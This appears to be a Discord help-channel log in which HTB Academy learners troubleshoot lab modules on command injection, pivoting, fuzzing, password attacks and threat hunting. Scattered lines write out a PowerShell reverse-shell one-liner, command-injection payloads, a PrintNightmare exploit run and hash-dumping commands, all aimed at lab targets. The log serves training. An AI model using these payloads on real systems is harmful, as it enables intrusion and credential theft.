#modules
Yeah, it doesn't. Domain users, as well as local users, can be part of the local Administrators group.
The --local-auth option is used when you wish to authenticate using a local user account.
oh ty
Where can I find the flag if I've already downloaded the file with the flag in it?
open the downloaded file
there is no need to download the file though, just curl it without the -o option
the file should be in your current directory
where?
well then what's the flag? there's a bunch of stuff here!!
I remove the -o
HTB{blahblah}
*removed
something like that
yeah no not there
you removed the -o from here?
just show a screenshot of what you're trying and getting...
are you on pwnbox or linux?
good luck with everything on HTB then
pwnbox
I don't, it only shows website info

hi can you help me?
I'm doing the Introduction to Bash Scripting
and the site doesn't accept my answer
why do this?
Because your answer may be wrong

I downloaded firefox profiles from HTB vm to my machine in ~/.mozilla/firefox directory but when I run firefox_decrypt.py, it doesn't show those profiles
In this question I can get the right answer (index = 1) and I can run the code, but I don't know what I can write in the submit container
echo $domains[1]
You'll need to run it on the target, I don't recall transferring anything back to my machine
But the target machine doesn't have the Python version that firefox_decrypt requires
i don't recall running into version issues ¯\_(ツ)_/¯
I can't really upload the photo, but it's the Command Injection module
I use the payloads from the sections but none work
ip=127.0.0.1%0als
this does the ls; when I want to add the -la it's invalid input
any suggestions on how to add both??
same in #cpts
Cleaned up.
+-la at the end
So it looks like ls+-la
thx, but not like that; I figured it out, it's %0a{ls,-la}
That's another way of doing it
yea the section was not clear about that but it was ok 😭
It takes some mild knowledge of linux
Command injection assumes some level of knowledge of commands
Anyone help on identifying SSRF, how to get the flag?
Not sure if this is the right channel...but just to confirm, HTB Academy is not having any Black Friday sales right?
Yes, that is correct
sad times
That was to be expected. I haven't seen any Black Friday offers from the HTB Academy yet.
?
do you have a question?
Ohh
Please
No. If you lost access to an account, contact the support of that website.
We cannot help you. Hacking is illegal
Ok
Yup, explore an internal vulnerability to find an SSRF exploit and submit the flag like that
What?
awesome
Then save money
You know how to do it?
yes
Anyone have any advice for part 2 of the skills assessment in the Login Brute Forcing module? I can't seem to connect to FTP
Any clue on completing it
I am stuck in "information gathering - web edition" module "web archives"
"Going back to November 1998 on google.com, what address hosted the non-alpha "google search engine prototype" of google?" I tried http://google.stanford.edu, http://stanford.edu, https://google.stanford.edu, https://stanford.edu
But they are all wrong
follow the methods discussed in the module
yes
Can you check your DM?
no
The only method is using the Wayback Machine? Which goes to http://google.stanford.edu
Can you give any clue to solving it
without context?
what does the hint say?
No, the question was: exploit the SSRF vuln to identify an internal web app, access it and obtain the flag. I had run a port scan and found port 8000 to be up but closed. Any clue how to connect to it and get the flag?
Well if it's ssrf, use your imagination
There is no hint button, but it says "eg. http://google.com", which is wrong... I just found the correct answer. It should be "eg. http://google.com/"
port 8000 is open 😉
It's missing the /
same thing
have you tried sending a request to that port?
Yup via burp but getting an error
let's see the request
If it's not a t0 module I suggest taking this to DM to avoid spoilers
same
So no help i guess
Just be patient for assistance, there's no dedicated support for skill issues
Anyone done the File Uploads module? Need some help with exiftool: the command is telling me that it doesn't support "writing of SVG images". Does anyone have suggestions on how to proceed? Do I need to open it in a hex editor?
(I realize that's a "skill issue" question)
Italian?
inglese
You don't necessarily need the exiftool to do anything in this module
It's just used as an example
Ahh. Thanks.
ok
This is an English-only server. You might be able to make a post in #1225791307256168448; you might need to follow #welcome to post there
Also I suggest DeepL for better translations
thanks
what you mean?
I've had customers use it for translating product data. And DeepL started translating brand names
hahahha, sounds like it makes direct translations
hi guys
so I'm trying to complete File Transfers
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer
I uploaded the zip file on Windows and found a flag, but when I'm entering it, it says that flag is wrong. Why so?
you are supposed to run "hasher upload_win.txt" and the output of that console command is the flag, not the content of the file
ok, I did it, and it's not working
Anyone having issues with logging into the remote Windows machine in any of the Hack The Box Academy modules:
──╼ [★]$ xfreerdp /v:10.129.178.9 /u:htb-student /p:HTB_@cademy_stdnt! /dynamic-resolution
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-767577/.config/freerdp
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-767577/.config/freerdp/certs]
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-767577/.config/freerdp/server]
[12:26:56:162] [8629:8630] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
┌─[eu-academy-2]─[10.10.14.97]─[htb-ac-767577@htb-yfpn6f0kqo]─[~]
└──╼ [★]$
Put your password in single quotes
Also tried that:
xfreerdp /v:10.129.178.9 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
[12:30:01:792] [13373:13374] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
pinged the ip address too
You can also try setting /tls-seclevel:0
And /cert-ignore
I don't even know how to use exiftool, I did the one you mentioned manually
Just follow the xxe attack instruction in that module to read the file and you’re done
thanks I tried rdesktop and that worked
Good 🙂
.
Make sure there’s no spaces at the end
there isnttt😭
Hi. Have you passed Parameter Logic Bugs? If yes, could you give me a hint in the submodule PoC and Patching - Null Safety? I'm trying to find a way to disclose the id of the user. I've checked all functions where req.body and req.params are used and an id is returned. There are not so many places which return an identifier, but in all cases I didn't get it. I tried to find any NoSQLi but it seems that's not the way to solve it.
verify /etc/hosts has the right ip
ahh yes thank you
is that supposed to be there?
no idea, you didn't mention the module or section
skills assessment web fuzzing
that's the wrong answer btw ^ so not a spoiler 😅
I have quite a few 403s
but I don't think it's asking for 403
attacking web applications with ffuf?
it does actually spoil the vhost which is an answer
it dies 10 seconds after I SSH
sorry yes attacking with ffuf
also I wasn't using the dots between the specified extensions
careful of spoilers
sorry
ahh let me try with port
it looks like you haven't run hasher.
stupid question but I'm trying to do the first task on intercepting web requests and no matter how much I URL encode it, I can't get it to work
legit every other command works but that
That question does not require encoding the payload. Do you use Burp Suite?
Yes I'm using burp suite
i even verified that the flag was there
||ip=;cat flag.txt;||
This was my payload and it didn't work
maybe try leaving a valid octet at the beginning before the ';'
what do you mean by valid octet?
the ping command expects you to complete an IP - like 127.0.0.X
the X is the last octet.
so the server runs 'ping 127.0.0.X;cat flag.txt'
hey, did you find answer to that question? 
Yes I finished that
could you tell me how I get "foothold" for that
||ip=3;cat flag.txt||
I mean I don't know the filename, directory etc.
nope still nothing
Iframe on 8080
thanks

I sent you DM
on the Pass the Ticket from Windows section of password attacks, it won't let me log in via xfreerdp to the windows client:
┌─[us-academy-1]─[10.10.14.239]─[htb-ac-605555@htb-fdebtjpfru]─[~]
└──╼ [★]$ xfreerdp /v:10.129.5.38 /u:Administrator /p:AnotherC0mpl3xP4$$
[16:52:34:048] [9928:9929] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[16:52:34:048] [9928:9929] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[16:52:34:249] [9928:9929] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
what should I do about this?
idk
ok hold on
that wasn't helpful
why are you responding with "idk?"
if you don't know why are you saying anything at all?
this is a Discord channel where we aim to get advice from people who either know or have a good idea of how they might be able to help
idk buddy
when I reset the target or pwnbox it doesn't do anything
well, your password contains special characters
ok should it be in quotes?
operating systems will process certain special characters in other ways, it's always best to wrap it in quotes so it's a literal string
you can try echoing the word without in the terminal and see if it echos back correctly
I did that and it didn't work but now I'm restarting target and trying again with quotes
will try double quotes then single
single quotes for literal string
ok
thanks single quotes worked
ok solved first two questions on my own
I'll let you know if I have any more issues
I solved all three questions on my own. I'm gonna do the optional challenge tomorrow after I take notes on the section again on my own.
that way I can make sure I really understand it before I move onto next piece of material
not what this discord is about
My bad
🤔
https://academy.hackthebox.com/module/158/section/1432
Target(s): 10.129.87.54 (ACADEMY-PIVOTING-LINUXPIV)
after doing:
$ sudo sshuttle -r ubuntu@10.129.87.54 172.16.5.0/23 -v
i tried to nmap the windows box with:
nmap -v -sV -p3389 172.16.5.19 -A -Pn
I can't find the open port but I noticed that the traceroute doesn't show tun0 nor the ubuntu pivot host,
it shows my VM hop and my home router hop
is this normal?
any idea how I can approach this issue?
nvm, xfreerdp works
ok -sT -.-
could someone help me do a command
And what command would that be
that my friend would be a script, not a command
oh
sry I don't know much
and i wanted those combinations to be tested at superhuman speeds on a certain website
this channel is for htb's academy platform
are you trying to brute-force a website on the internet?
wat that
yeah I don't really see many RoEs allowing brute forcing
where are you trying to do this exactly?
on a website
Rooobooox
yeah which website
I'm quite sure if they find out, your account will be banned
it's illegal buddy
reach out to riot support if you need into your account and you lost access, no one here can help you. anyone private messaging you saying they can is lying and scamming you.
oh
It’s not your account most likely. You’re allowed to create an account and use it, but the account is still from the company where you created it
ohh
that's true too
but what if my account was compromised
and the shitters down in riot games cant answer your email
then reach out to riot no one here can help you, no riot staff is here
hypothetically
😆
again no one's going to prison to try to get "your" account
well i'm not going to keep going in circles
It’s three easy steps
But yeah, this isn’t hacker for hire. If that’s what you’re after, this isn’t the server for you
inhales in dad "Hello braindead"
You go to the website and download it
it doesnt work
go to youtube, watch a tootoorial
i'll leave it on your moms nightstand tonight for you in the morning
I'm just gonna say: if you can't figure out how to get it, you probably won't be able to figure out how to use it
my guy, this channel is for the Hack The Box Academy platform, you'll need to ask in another channel
This isn’t the channel to help you with setting up a vm
but general no work
I already tried
Try again.
Read the steps again
Lol I think he doesn’t even know what hackthebox is to create an account in order to accomplish the steps
He figured it out now
Hope so
he did
i wonder how long he lasts
In the Pivoting and Tunnelling module, RDP and SOCKS Tunnelling with SocksOverRDP: not able to execute SocksOverRDPPlugin.dll even though Defender is off.
running as admin?
Yes cmd as admin
Make sure real-time protection is off
.
It’s off.
Oops. Typo I meant SocksOverRDPServer.exe
redownload it, unzip the file, cd into SocksOverRDP-x64 and run: regsvr32.exe SocksOverRDP-Plugin.dll
Yes this has worked, but I wasn't able to run Server.exe with admin privileges
someone knows how can I cheat using lockdown browser in a classroom?
No
Ask your teacher
you can dm me if you want
noticing a trend here...
seems half of all people who join just want something hacked...
Yeah. Comes in waves
in the pivoting module, "Socat Redirection with a Reverse Shell" section, how can I run the payload on the windows pivot target?
there's socat for windows if you google it
no I mean how do I get command execution on the windows machine?
How to transfer the payload there in the first place
there are several ways to transfer files.. socat uses ssh so I'd probably use scp
did you complete the file transfer module?
scp on windows huh
on windows i like to rdp
Are you saying there is an scp server running on the windows target waiting for connections?
no
I am not sure you are getting what I am saying
I can't bro it's on a different network
sure you can, in my notes i'm using rdp
rdp from the ubuntu pivot machine?
tunneling through it i believe
if we need a tunnel already setup then what's the point of socat redirection
it explains in the module, you can use it as a redirector.. you can use it to establish rdp, or whatever you want
I believe it's actually the opposite, the module assumes you already got rdp connection to the target and just still need cli for your tools
hyy anyone doing ctf? may I join u guys. plz
Module: Attacking common services.
Section: EASY LAB.
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
I tried various brute-forcing methods, nothing has worked out so far; during MySQL brute-forcing I get this error: `[ERROR] Host '10.10.14.60' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'`
any hint would be helpful
Module: Shells & Payloads
Section: Reverse Shells
When I run powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.25',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" on the target machine I get so many syntax errors. I don't know why, because it is the same payload as in the section
Also, when I try to disable AV, it says that I don't have permission but in section, they successfully disabled it with normal user
Run this in command prompt
Thanks, it works now
Common practice is to base64 encode the payload using revshells.com; it might work
It didn't work because I ran it in powershell instead of cmd
encode the command, then you can run it in powershell
Information Gathering - Web Edition (Virtual hosts)
vHosts needed for these questions:
inlanefreight.htb
can't enumerate using the domain (inlanefreight.htb)
Things I did already:
adding the IP and domain to the entry file
Did you add the port while enumerating?
It will work, the Password Attacks module teaches that
anyone know if there is something going on with the Academy-Login Brute Forcing-Web Services box? I am unable to ssh in, it rejects the cert
have you chmod 600?

I refreshed the IP, no luck. But tried with my own device and worked
lmao
yes sir it's not working with the domain
you need to disable the "Allow external apps" setting, @low girder, but maybe this needs to come from an admin like @surreal rain
admin to the rescue
wtf
I just blocked them
we need @compact patrol to boot him
you can't, lmao, a stupid feature of Discord lol; this guy saw an NTTS vid and thought he was cool
thanks, will get this done!
Anyone know why gobuster is throwing this error
Error: unknown shorthand flag: 'x' in -x
And gobuster vhost -u http://inlanefreight.htb:35914/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain -s 157:157 gives: Error: unknown shorthand flag: 's' in -s
It's acting like it doesn't know those flags
I need to filter a lot of false positives for the web fuzzing module
Also this is failing
gobuster dns -d http://inlanefreight.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Unable to validate base domain: http://inlanefreight.htb (lookup http://inlanefreight.htb: no such host)
Thanks
Should be resolved now.
ayee nice, as to why Discord silently rolls out this feature and enables the permission by default for the everyone role, that is beyond me lol
Because developers want people to use their shiny new feature. 🤷♀️ I'm more annoyed that it appears to evade automod and that there isn't a clear option to expel a bot once it's being used. You can't "ban" it for example.
yep, because the bot isn't in the server, it's a user calling the bot externally, but it obfuscates its response by reacting to itself, so you wouldn't see the user who triggered it; you could still see which user triggered that command under 'Trigger Activity' of the message
Right. I get the technical reasons why. It's just an irritating setup.
Dm
Guys, I need help with this question:
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
This is the command I am running to get the results:
ss -tuln4 | grep 'LISTEN' | grep -v '127.0.0.1' | wc -l
Output: 8
But the module is saying it's incorrect...
htb-student@nixfund:~$ ss -tuln4 | grep 'LISTEN' | grep -v '127.0.0.1'
tcp LISTEN 0 50 0.0.0.0:139 0.0.0.0:*
tcp LISTEN 0 100 0.0.0.0:110 0.0.0.0:*
tcp LISTEN 0 100 0.0.0.0:143 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:445 0.0.0.0:*
tcp LISTEN 0 100 0.0.0.0:993 0.0.0.0:*
tcp LISTEN 0 100 0.0.0.0:995 0.0.0.0:*
This is clearly 8 tcp listening...
I remember using that exact same command and being very annoyed at that question
127.0.0.54%lo:53 still counts as localhost
Why?
blame the people who chose our ip addresses
localhost is a range from 127.0.0.0-127.255.255.255
guys I am stuck on Firewall and IDS/IPS Evasion - Easy lab. Any hints?
"Using GoBuster against inlanefreight.com to fuzz for subdomains using the subdomains-top1million-5000.txt wordlist, which subdomain starts with the prefix "su"?"
According to gobuster there isn't one:
Found: ns1.inlanefreight.com
Found: ns2.inlanefreight.com
Found: blog.inlanefreight.com
Found: ns3.inlanefreight.com
Found: my.inlanefreight.com
Found: customer.inlanefreight.com
I ran it 3 times
time to try larger wordlists ig
Make sure that you really should scan ‘com’ and not ‘htb’.
I'm using the one they want you to use. subdomains-top1million-5000.txt
gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
try using vhost mode instead?
If rate limiting is used, this is not a good idea 😉
The question is confusing it says subdomains and vhost
Using GoBuster against inlanefreight.com to fuzz for subdomains using the subdomains-top1million-5000.txt wordlist, which subdomain starts with the prefix "su"? Respond with the full vhost, eg web.inlanefreight.com.
com or htb
So you want subdomain or vhost?
It's the .com question
It's found using the subdomains-top1million-20000.txt wordlist. So the question is worded wrong.
I think the asking for vhost part is also incorrect
You should also find it with the list of 5000 entries
I don't want to use the web-based Pwnbox, can I install the VPN or something on my Kali VM?
odd, grep'ing the 5000.txt returns the subdomain but gobuster failed 3 times to find that subdomain when told to use the 5000.txt file
You should then be able to find the answer with this command
odd, it failed 3 times
But then the 20000 .txt worked for some reason. But I confirmed the word is in the shorter wordlist. So I don't know the issue
I can send you a DM to show you that GoBuster does exactly what it is supposed to do
is it possible ?
yes
yes, just use the VPN
how
I got a screenshot of it failing too. Is gobuster just unreliable?
Maybe I should just use ffuf
feroxbuster where it's at
I don't know, I've never had any problems with it.
Thank you so much! I was struggling with my crappy internet
However, if your internet connection is weak, you are better off using the PwnBox.
hell nah 💀
you can't get subdomains from an ip
I was using the wrong arguments
the question is asking for subdomains not directories
as I said in general:
netstat lists out ipv6 (see not ipv4 part question)
and localhost (see not localhost part of question)
I thought it said it needs everything, not ipv4 and localhost only
That would be something like netstat -lt | wc -l then
Wait not t
-l4
ss -4 lists IPv4, but not sure how it's done on netstat
it should be the same
I'm gonna reach my pc rq
I tried 11000 and only found 5 subdomains
This was the exact same thing that happened to me
yeah now I'm asking how you fixed it
how am I supposed to find the subdomains
I just ran a different bigger wordlist. But the subdomain IS actually in 5000.txt
gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
So two different people have had gobuster fail to find that subdomain around the same time

The question for inlanefreight.com should be done in dns mode
Guys, I am getting started with the basics and I am taking on the Operating System Fundamentals path; in the Linux Fundamentals module, section on system information, there are two questions that don't make sense. I need help understanding.
01 - What is the path to the htb-student's mail?
02 - Which shell is specified for the htb-student user?
I was able to manage the rest, but these ones are not clear, any help please? Thanks!
but that too doesn't seem to be working
Try using the top1million-20000.txt, that's the one I used
okey I'll try
gotta find the env var for mail and the shell in passwd
what about the ip?
for this one you need to use the vhost mode
aren't I supposed to run the command on that instead of inlanefreight.com?
got nothing on that
it's confusing, I'm at this for 1-2 hr
It's two different questions
also you can't enumerate subdomains with an IP
Top one is vhost fuzzing on .htb. Second is subdomain fuzzing on .com
Although it doesn't help they also use the word vhost in the second question
Information Gathering - Web Edition -> Virtual Hosts module
Use vhost enumeration i.e. -H "HOST: FUZZ.inlanefreight.htb"
okey thanks I'll try that
ffuf
You know what, I thought about that, just thought it wasn't the actual thing, guess I should act on curiosity next time... Thanks really appreciate, you're a life saver!
I'm not "a life saver!" ^
Please do not post solutions
Yeah, didn't work
I tried increasing/decreasing for extra lines from netstat, still didn't work
what command did you use?
As i understood
It needs: ipv4 and localhost
I think my problem is more with english lol
Or
No or
idk, the question is weird, just get rid of the localhosts
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
not localhost
IPv4 only
treat em as separate
also for question 3 on that same module here's your hint:
find things inside single ' and double " quotes
netstat -tuln4 | grep "LISTEN" | grep -v '127.0.0' | wc -l
@leaden island this ^
yeah... the sad part is it really isn't
Ooooooo
Didn't work
Okay, I decremented by 1 and it worked
remove 1 line for the info stuff ig
read the 3rd question
Use curl from your pwnbox to obtain the source code of the 'url' and filter unique paths of that domain
Yep, cried so hard on that one
This should be easier
💀
here's your help for it before I go to sleep (cos I can guarantee you ain't gettin it also so you don't need the forum)
||curl https://www.inlanefreight.com > temp.txt && cat temp.txt | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep www.inlanefreight.com | sort -u | wc -l ||
there's an easier way to do this but REGEX is the next module so...
said regex:
||curl https://www.inlanefreight.com | grep -Eo "www.inlanefreight.com[^'\"]*" | sort -u | wc -l||
It requires some HTML knowledge and such to properly filter
No way I'm getting this LOOOL
I just used a forum command for it, one of them is well explained
Hey guys I am stuck on Firewall and IDS/IPS Evasion - Hard lab. Any tips?
'Linux fundamental' HTB says..
udp scan takes ages
It's still a fundamental
Reset your vm/connection and try again, it shouldn't take too long
It's surface level knowledge
I am scanning all the ports, it still shouldn't be taking long?
Yeah it shouldn't
I'm missing a lot here
had to find the regex version to understand the version the module expects you to use
Hmm I see, thank you.
edging on not very surface knowledge
Google isn't your enemy
Heck even chatgpt/AI isn't your enemy for explaining things
Or a tool like explainshell if you find a command online
ahh yes chat ji-pi-ty, the one stop shop to anything text based
Don't expect AI to craft you a functioning one liner
But it can explain things (that are documented)
It is still taking a while, the command I am executing is sudo nmap <IP> -sU -T4 -n -Pn --disable-arp-ping -p-
anything wrong with the command?
I'm stuck at this for hrs! can anyone help me enumerate vhosts using gobuster?
Also, why not use a Stealth scan instead
wouldn't it take ages
No
alr let me see
Because you need a domain to append
--append-domain does nothing if you don't have a domain to tell it
where to look for the domain? the domain given is inlanefreight.htb but that does not exist and the IP wouldn't work
- vhosts needed
There's a --domain flag iirc or -d
yeah but what should I put in that
that flag is for dns mode?
For vhost
Maybe do --help for it to figure out the flag
i always use ffuf ¯\_(ツ)_/¯
Hi All, I'm currently attempting the "Bleeding Edge Vulnerabilities" of "Active Directory Enumeration & Attacks", I've confirmed the target is vulnerable to PrintNightmare, I am then attempting to create the msfvenom payload with the syntax provided within the module, when I get the following: "-bash: backupscript.dll: Permission denied", I've tried running this with sudo on the attack host, has anyone else encountered this? Done a quick search for 'backupscript.dll', and I can't see any historic comments/questions in here pertaining to this exactly...
have you tried this?
isnt this what you tried?
Hello, in the "ICMP Tunneling with SOCKS" section in the Pivoting module, I need to build ptunnel-ng but the glibc on my host is 2-3.6 and the one on the target is 2-3.1, what's a workaround?
fuzz against x.inlanefreight.htb
So managed to work around this by creating the msfvenom payload on my local instance of Kali, and then transferring the .dll to the attackbox using python http.server... now when I try and run the CVE.py, I'm getting another error:
┌─[htb-student@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ $sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'
[*] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\172.16.5.225\CompData\backupscript.dll
[*] Try 1...
Traceback (most recent call last):
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 636, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
There's always something with these modules....
I think this is wrong, I'm getting too much output to make sense of
seems like \??\UNC\172.16.5.225\CompData\backupscript.dll isn't accessible from the target
confirm you transferred the dll to that path
anyone know?
filter out negatives
compile statically on your host?
still too much
Didn't really understand the point in Catching Files over HTTP/S under File Transfers
What are they talking about? Setup an Nginx on the targeted network?
I'm getting 200 for everything
you can filter by more than 1 size
how to do so
try -fs 10918,116
ok
problem is the tool uses its own script to build, it's not just a simple gcc
thank you so much
open the script and then append -static to the script
the line
yes, when in an isolated network (air-gapped environment)
#!/bin/bash
set -x
OLD_WD="$(pwd)"
# quote $0 so a script path containing spaces still resolves
NEW_WD="$(dirname "${0}")"
cd "${NEW_WD}"
if ! autoreconf -fi; then
    aclocal
    autoheader
    automake --force-missing --add-missing
    autoconf
fi
cd "${OLD_WD}"
# pass the caller's arguments through to configure intact
"${NEW_WD}/configure" "$@" && make clean && make -j"${BUILDJOBS:-4}" all
aight so chat gave me sth gonna try it
What do you mean?
It's not stated there that it's meant for air-gapped networks...?
Or it's just stating another way to setup a webserver?
you're right
I'm stating that it's an obvious use case
Just don't understand the point of this module
yeah I use chatgpt for research at least an hour a day
I uploaded the backupscript.dll to "/home/htb-student", then used the following command to create the share "sudo smbserver.py -smb2support CompData /home/htb-student/backupscript.dll", so I honestly have no idea why the share isn't accessible...
Thought to myself that I must have been missing something
Because it seems a bit useless if I'm being honest
shares don't work that way, you're supposed to provide a directory as the share root
not a file
its not
Thanks for the static idea @lusty thicket, if anyone is wondering, just change the last line like this
"${NEW_WD}/configure" --enable-static --disable-shared CFLAGS="-static" LDFLAGS="-static" "$@" && make clean && make -j${BUILDJOBS:-4} all
wow.... thank you, that worked, appreciate that a lot!
awesome!
wait lol there was even a guide on how to build a static binary in the section but I didn't pay attention lol
I didn't even realize what static meant at that point
but if it works it works so whatever
can someone explain to me what this question is asking me to do
ik there's something in the script.js
what does the question say
File Upload Attacks - Skills Assessment
Hello guys, I need some help here for the File Upload Attacks module - final skills assessment. I've successfully got the upload.php source code, and found that the uploaded file directory is "./user_feedback_submissions/", I've changed the filename as per requirement "241130_image.jpg". After uploading this file, I still cannot reach the uploaded file in the target directory: "http://83.136.254.158:53442/contact/user_feedback_submissions/241130_image.jpg" It returns a 404 not found page. So, I cannot get a POST request in Burp Suite and cannot move forward. Could someone help me to check and find the problems? Thanks!
This RDP Tunneling double pivoting module was real rough
nice bg
Has anyone completed the Active Directory Trust Attacks? I'm in the skill test and on the very last question, please reply to this message and I will DM you!
Yo guys, I am currently doing the Password Attacks module, and there is a section where we need to get an NTDS.dit file. When I transfer this file to my attack machine, how can I get the hashes from this file, what command can I use?
the module explains this
please, read it again
Is it by using the secretsdump tool?
is it?
impacket-secretsdump -sam /path/to/sam.save -system /path/to/system.save LOCAL
use info from the current section and the SAM section to retrieve the necessary files
Oh, thank you!
Hey there, I'm currently doing the "Introduction to Threat Hunting & Hunting With Elastic", I feel completely lost on the thought process of how to look for the correct event.code ID and narrow my searches, how can I get better at determining the proper Windows event ID or Sysmon ID?
There should be a list of event IDs
1 : Process Create
2 : Process modified timestamp
3 : Network Con
etc.
From the module itself you mean ?
yea
I am using GTFOBins to download a file using openssl, and in the section we have to spin up a server that has a self-signed cert; when I am connecting to the server there is an error for not trusting that self-signed cert
nvm
I was doing the skills assessment for example and I found #1 pretty easily, fine, however for hunt #2 and especially #3 I'm like "how the hell am I supposed to know that I needed to use this event.code ID?"
@rustic sage I see what you mean but still
you're on the skills assessment
Yea, Introduction to Threat Hunting & Hunting With Elastic - Skill Assessment
sysmon only has 30 or so event codes and they are usually pretty descriptive. so if sysmon is available just open https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon and check each of them
how can i get fingerprints of vhost sub-domains
Leverage event.code 13 and make sure that your query matches the case of the registry.path field.
For sysmon yes I agree there isn't a lot of IDs however for Hunt#3 for example
Leverage event.code 4104 and the powershell.file.script_block_text field.
yes, I'm wondering how I could find event 4104
update nikto
even searching Google for "powershell lateral movement windows id" I got a bunch of event IDs except this one
I read that but "4104" is not mentioned
it is the latest
then use gobuster or ffuf for virtualhost bruteforcing
but do they give me service information? so far I tried them and only found the subdomains
Alright, I'll try to get better, it's just it doesn't click yet in my head
how to get information on a known subdomain
you need to find the version, it's in the section, read it carefully
it's very easy and don't forget to change the hosts file and add the IP of those vhosts
okay I'll try ffuf and read the man page
something that's pretty cool (but a lot of information) is the SANS posters on DFIR. Look at this one for example (https://www.sans.org/posters/hunt-evil/), it talks about what's normal behavior and then shows common ways to detect lateral movement techniques and what event codes/registry entries/files are associated with it. They have a few of these posters
Knowing what’s normal on a Windows host helps cut through the noise to quickly locate potential malware. Use the information below as a reference to know what’s normal in Windows and to focus your attention on the outliers.
@tranquil axle Thanks!
Hi everyone,
I'm currently working on the Brute Force Attack module, specifically the first exercise where we need to determine a PIN by brute forcing.
Before this module, we learned about ffuf. In the exercise, we are given the parameter to brute force (in this case, the PIN). However, I’m wondering what we would do if we weren’t provided with the parameter name (e.g., pin).
I tried using ffuf to discover the parameter, following the techniques we learned in the ffuf module. Unfortunately, this approach didn’t yield any results.
Does anyone have suggestions for identifying the correct parameter when it’s not explicitly provided?
Thanks!
Viewing the source code?
The answer is for my question?
yes
so there is no source code at all
The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
this is what is given when you browse the web app
so I used ffuf and determined that a directory called pin is present
idk what you're asking here, but you can view the element IDs by inspecting the source code, or maybe running the pages through Burp
ffuf -u http://94.237.59.16:44890/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
(ffuf ASCII-art banner)
v2.1.0-dev
:: Method : GET
:: URL : http://94.237.59.16:44890/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 98ms]
so ffuf gave me the directory
ok what does fuzzing for directories with ffuf have to do with brute forcing a pin?
i don't understand your question
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29
we need to get the parameter to determine where to bruteforce right?
